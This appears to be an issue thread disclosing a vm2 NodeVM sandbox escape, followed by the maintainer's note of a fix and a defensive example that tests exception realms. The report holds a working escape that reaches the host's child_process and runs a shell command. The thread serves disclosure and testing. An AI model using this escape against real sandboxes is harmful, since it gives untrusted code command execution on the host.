It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.
In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:
The vm module is not a security mechanism. Do not use it to run untrusted code.
I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.
```js
const {NodeVM} = require('vm2');
const nvm = new NodeVM();
nvm.run(`
    try {
        this.process.removeListener(); // or .on, .once, or anything that throws a host exception
    }
    catch (host_exception) {
        console.log('host exception: ' + host_exception.toString());
        // The exception is a host-realm object, so its constructor chain ends at the host's Function.
        host_constructor = host_exception.constructor.constructor;
        host_process = host_constructor('return this')().process;
        console.log('host execution: ' + host_process.mainModule.require('child_process').execSync('id').toString());
    }
`);
```
@eugenekolo Thank you for reporting the issue; it's fixed in 3.6.1.
The statement on Node's VM module is really important because Node's internal VM is not intended to run untrusted code. That's why I started this project - to make an additional layer that makes the context secure enough to run untrusted code.
And as with every piece of software out there that claims to be secure - it is safe until someone finds a way to break it.
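The root cause in the report is that an exception thrown by host code reaches the sandbox as a host-realm object. The following added example (not code from vm2 or from this thread, and not vm2's actual 3.6.1 fix) uses Node's core `vm` module to show how to test which realm a caught exception belongs to, and how a wrapper created inside the context converts it at the boundary. `hostThrower`, `PROBE`, `GUARD_FACTORY` and `exceptionRealm` are names assumed for illustration.

```javascript
const vm = require('vm');

// Constructed stand-in for a host API that throws, like process.removeListener()
// called without arguments in the report above.
function hostThrower() {
  throw new TypeError('constructed host error');
}

// Sandbox-side probe: compares the caught exception's constructor chain with the
// sandbox's own Function to tell which realm the exception object came from.
const PROBE = `
  (function () {
    try { fn(); } catch (e) {
      return e.constructor.constructor === Function ? 'sandbox' : 'host';
    }
    return 'no exception';
  })()`;

// Trusted wrapper factory, evaluated inside the context so that the wrapper and
// the error it rethrows are sandbox-realm objects; hostFn stays in the closure.
const GUARD_FACTORY = `
  (function (hostFn) {
    return function guarded(...args) {
      try { return hostFn(...args); }
      catch (e) { throw new Error(String(e && e.message)); }
    };
  })`;

// Returns 'host' or 'sandbox': the realm of the exception the sandbox catches.
function exceptionRealm(useGuard) {
  const context = vm.createContext(Object.create(null));
  context.fn = useGuard
    ? vm.runInContext(GUARD_FACTORY, context)(hostThrower)
    : hostThrower;
  return vm.runInContext(PROBE, context);
}

console.log('unguarded:', exceptionRealm(false));
console.log('guarded:  ', exceptionRealm(true));
```

The wrapper converts only the thrown value; return values and arguments that cross the boundary need the same treatment, and a probe like this can serve as a regression test for each exposed host function.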